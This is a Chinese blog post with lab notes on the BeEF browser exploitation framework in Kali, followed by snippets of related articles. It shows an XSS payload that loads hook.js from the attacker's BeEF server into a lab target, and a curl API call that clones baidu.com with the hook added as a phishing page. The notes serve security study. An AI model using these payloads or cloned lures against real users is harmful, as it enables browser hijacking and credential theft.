BeEF-XSS实验手记

最新推荐文章于 2024-04-26 15:25:52 发布
最新推荐文章于 2024-04-26 15:25:52 发布
阅读量2.2k 收藏 14
点赞数 2
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sinat_34462336/article/details/105279106
版权

这里使用的是Kali里面预装的BeEF-XSS,在Kali里面打开 应用程序-08-漏洞利用工具集-beef XSS framework。
在这里插入图片描述
或者直接运行beef-xss命令运行:
在这里插入图片描述
kali已经把beef-xss做成服务了,可以使用systemctl 命令来启动或关闭beef服务器

systemctl start beef-xss.service    #开启beef
systemctl stop beef-xss.service     #关闭beef
systemctl restart beef-xss.service  #重启beef

这个时候可以登陆

<ip>:3000/ui/panel

进入BeEF的web界面了:
在这里插入图片描述
我看到很多网上的教程都说Kali里BeEF的初始账号密码是beef/beef
而我的却显示密码错误,此时可查/usr/share/beef-xss/config.yaml里的账号密码信息:
在这里插入图片描述
我这里的默认账号密码是beef/root
输入账号密码可进入BeEF的主界面。

打开一台XSSeducation靶机,输入XSS代码:

<script src="http://192.168.85.128:3000/hook.js"></script>

在这里插入图片描述
BeEF上检测到被攻击主机(zombix)上线:
在这里插入图片描述
commands下展示的是可以执行的命令模块,BeEF可以检测出哪些命令模块可以在当前受害的浏览器工作, 并用颜色表示:
绿色:命令模块可以在目标浏览器上运行,且用户不会感到任何异常
橙色:命令模块可以在目标浏览器上运行,但是用户可能会感到异常(比如可能会有弹窗,提示,跳转等)
灰色:命令模块尚未针对此目标进行验证,即不知道能否可运行
红色:命令模块不适用于此目标
在这里插入图片描述
在这里插入图片描述
执行结果如下:
在这里插入图片描述
除了在页面中进行XSS注入挂上hook.js以外,还能通过克隆网站,在网站上挂上hook.js,诱骗受害者点击网页从而获取受害主机控制:

curl -H "Content-Type: application/json; charset=UTF-8" -d '{"url":"<URL of site to clone>", "mount":"<where to mount>"}' -X POST http://<BeEFURL>/api/seng/clone_page?token=<token>

##<URL of site to clone> 要克隆页面的URL
##<where to mount> 是指克隆的页面你想放在BeEF服务器的那里
##<token> API 的token

为了获取API token,如果原本是通过直接运行点击图标或者直接执行beef-xss命令启动程序的,应该使用service beef-xss stop停止服务,然后进入使用/usr/share/beef-xss/beef 命令重新运行一次beef-XSS,等程序运行完毕,可以在命令行中找到API token且命令行会占用前台持续运行:
在这里插入图片描述
此时可以将所需要克隆的信息填入命令中,比如我的命令如下:

curl -H "Content-Type: application/json; charset=UTF-8" -d '{"url":"https://www.baidu.com","mount":"/baidu"}' -X POST http://192.168.85.128:3000/api/seng/clone_page?token=003d912d44dff8b15cc9ec231fc19667aa4791bf
{"success":true,"mount":"/baidu"}

执行成功后会返回{“success”:true,“mount”:"/baidu"}
在这里插入图片描述
beef的命令行中会出现:
在这里插入图片描述
登陆克隆界面:http://192.168.85.128:3000/baidu
发现并没有新的zombix上线,搜索网页代码中的hook.js发现src值不对。
在这里插入图片描述
在/usr/share/beef-xss/extensions/social_engineering/web_cloner/cloned_pages/找到文件www.baidu.com_mod
用vi打开定位到hook.js,将src改为https://192.168.85.128:3000/hook.js
在这里插入图片描述
重新进入克隆界面查看源代码,发现不生效。
重启/usr/share/beef-xss/beef发现克隆界面没有了。
可能是配置文件的问题,找到/usr/share/beef-xss/config.yaml
将此处的0.0.0.0修改为可以被访问的ip:192.168.85.129,保存并开启/usr/share/beef-xss/beef
在这里插入图片描述
重新克隆一下页面(记得更新命令里面的API token)
在这里插入图片描述
网页代码中的hook.js路径修改成功。
BeEF中接到zombix上线
在这里插入图片描述

_2y2y22yyy
关注
  • 2
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
浏览器攻击框架BeEF简介
THMAIL的博客
08-02 2242
前言 笔者发现国内很少有系统介绍BeEF框架的文章,所以笔者决定写一个系列。内容涉及攻击浏览器的技术,主要介绍这些技术的原理,并如何操作BeEF来实现,不涉及浏览器本身漏洞(门槛太高,笔者有心无力)。 预备知识 在看这个系列之前,读者最好要有一定知识储备。首先是对HTTP协议(CORS、 CSP等)要有一定的理解,其次是理解Web安全的常见攻击技术的原理和防御方法(比如XSS、CSRF、SQL inject等), 最后如果读者懂javascript语言就更好(可选,笔者的js也不咋地)。笔者认为学习B
kali之beef的使用
whoim_i的博客
11-03 2万+
目录一、beef介绍二、kali下使用beef配置beef实际操作 一、beef介绍 BeeF是前欧美最流行的web框架攻击平台,kali 集成Beef,而且Beef有很多好使的payload。例如,通过XSS这个简单的漏洞,BeeF可以通过一段编制好的javascript控制目标主机的浏览器,通过浏览器拿到各种信息并且扫描内网信息,同时能够配合metasploit进一步渗透主机,强大的有些吓人。...
Beefxss使用教程图文教程(超详细)_怎么把beef改成公网ip(1)
最新发布
2401_84252743的博客
04-26 427
beef-XSS界面有很多栏,重点是 Commands 栏的功能指令,其他的基本用不到,不用太留意。Online Browsers:在线浏览器,工具定时发送链接请求,链接成功就会显示在这里。Offline Browsers:离线浏览器Getting Started:入门指南,官方的一些文档Logs:日志,记录工具做过哪些操作Zombies:僵尸,记录可以利用的目标站点Current Browser:上线的浏览器,只有在目标在线的时候才会显示出来。
beef-xss安装与使用
Bu2n的博客
12-07 3326
文章目录kali安装与更新软件源beef-xss安装快速上手beef-xss kali安装与更新软件源 传送门 beef-xss安装 sudo apt-get install beef-xss sudo beef-xss 第一次启动beef要修改密码,要仔细看清楚 快速上手beef-xss http://127.0.0.1:3000/ui/panel beef的管理面板 输入自己的账号密码默认beef beef 这样就能进入到管理页面 查看kali的ip地址 构造下面js代码,想办法给其他人
kali之beef的使用_kali没有beef,网络安全开发基础培训
2301_76223496的博客
04-17 934
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。接着访问有勾子的页面http://192.168.133.131:3000/demos/basic.html 这里的主机名和端口号要按照你设置的来修改, 这里要注意一下kali下beef版本的勾子不支持IE8,最新版或者旧一些的版本可以。④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等。
xss-工具-Beef-Xss安装以及使用
weixin_44257023的博客
07-24 5964
xss-工具-Beef-Xss安装以及使用
vasp.5.4.4&beef-src.tar.xz
03-20
beef-vdW全称为Bayesian error estimation functional with van der Waals correlation, 是DTU在2012年做出来的一个新泛函,目前和Quantum Espresso,VASP,GPAW均有接口。具体的编译过程可以参考SUNCAT - Software...
Web应用安全XSS通过JavaScript攻击(实验).docx
06-20
在这个实验中,我们将重点探讨XSS通过JavaScript发起的攻击,以及如何使用Beef-xss工具进行模拟攻击。 实验目的旨在让你理解XSS的基本概念,掌握其攻击方式,特别是利用JavaScript的手段,并了解攻击的实施过程。...
Web应用安全XSS篡改页面(实验).docx
06-19
在本实验中,我们将使用beef-xss工具来模拟XSS攻击。beef-xss是一个开源的XSS攻击框架,能够模拟各种XSS攻击场景。我们将使用beef-xss工具来攻击pikachu站点,模拟用户登录pikachu站点,然后在beef-xss平台上控制...
beef-installer:用于发行版和Termux的BeEF安装程序!
04-17
ls bash install.sh python3 beef-installer.py准备好了! 如果是disro,则牛肉目录将位于环境变量$ HOME中,位于termux中的$ PREFIX / opt中Kali Linux(PC,Userland) Kali Nethunter无根Termux预览:Termux
raylib-beef:用于Beef编程语言的raylib绑定
05-06
雷利比牛肉raylib-beef是Raylib 3.1 dev的Beef包装器库,这是一个简单易用的库。 结合Beef编程语言的优势,制作游戏绝对令人满足! 注意力! 这种绑定仍在开发中。 可能会发生错误。 二进制文件已从存储库中删除。 ...
beef-xss钓鱼
Williamanddog的博客
01-27 614
BeEF(Browser Exploitation Framework)是一款非常强大的Web框架攻击平台,集成了许多 payload,可以通过XSS漏洞配合JavaScript脚本和Metasploit进行渗透。如果你的kali中没有beef的话,执行sudo apt install beef-xss进行安装。_ip:3000/clone_pikachu ,可以看到beef中有机器上线,在页面中进行登录。找到配置文件/usr/share/beef-xss/config.yaml。回到前台查看是否一致。
浏览器攻击框架BeEF Part 2:初始化控制
Fly_鹏程万里
08-22 1188
前言 在上一章,笔者已经介绍了BeEF框架。在这一章,笔者将介绍攻击浏览器技术的第一步:初始控制。 浏览器攻击方法流程 攻击浏览器一般分为几个阶段,看下图: 整个过程分为三个步骤,第一步是初始化控制,第二步是持续控制,第三步是攻击。在第三步中的七个攻击方法是可以交叉的,比如可以同时攻击用户和攻击Web应用。接下来会一章一章的介绍这些内容。这一章介绍初始化控制。 初始化控制 首先在这...
BeEF-XSS详细使用教程
热门推荐
星落的博客
05-12 4万+
BeEF-XSS简介 BeEF-XSS是一款非常强大的web框架攻击平台,集成了许多payload,可以实现许多功能! 启动BeFF-XSS BeEF-XSS管理登录页面 用户名默认为beef,密码在首次启动beef-xss时需要手动设置。(启动beef-xss会自动打开浏览器) BeEF-XSS主页面介绍 Hocked Browers online browers 在线浏览器 offline browers 离线浏览器 Detials 浏览器、插件版本信息,操作系统信息 L.
【网络安全beef-xss实操以及xss修复方案
你在看屏幕的同时,屏幕也在注视着你
09-07 2206
beef-xss实操
Linux自动化简单安装beef xss framework的方法及BeEF的启动
01-28 3573
Linux中BeEF的安装
浏览器利用框架BeEF测试
★慕名斋★
11-07 2498
0×00 前言 http://www.vuln.cn/6966 BeEF,全称The Browser Exploitation Framework,是一款针对浏览器的渗透测试工具。 目前对其测试的文章不是很多,所以希望通过本次测试给大家带来全新的认识。 0×01 简介 工具主页:http://beefproject.com
beef-xss各位报错解决方案
weixin_46976845的博客
03-06 1641
beef-xss各种报错原因:系统更新或者依赖包更新。原配置文件无法加载。 解决办法: apt-get remove beef-xss //卸载beef-xss apt-get purge beef-xss //删除beef-xss配置 rm -r /usr/share/beef-xss/ //重点,彻底删除beef-xss所有的用户配置,0保留 apt-get install beef-xss //重新输入密码后,就可以正常使用了 ...
云服务器上搭建beef-xss
03-11
在云服务器上搭建beef-xss(Browser Exploitation Framework)可以用于进行Web浏览器漏洞利用和XSS攻击的测试和研究。下面是一些步骤来搭建beef-xss: 1. 选择云服务器:首先,你需要选择一个云服务器提供商,如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值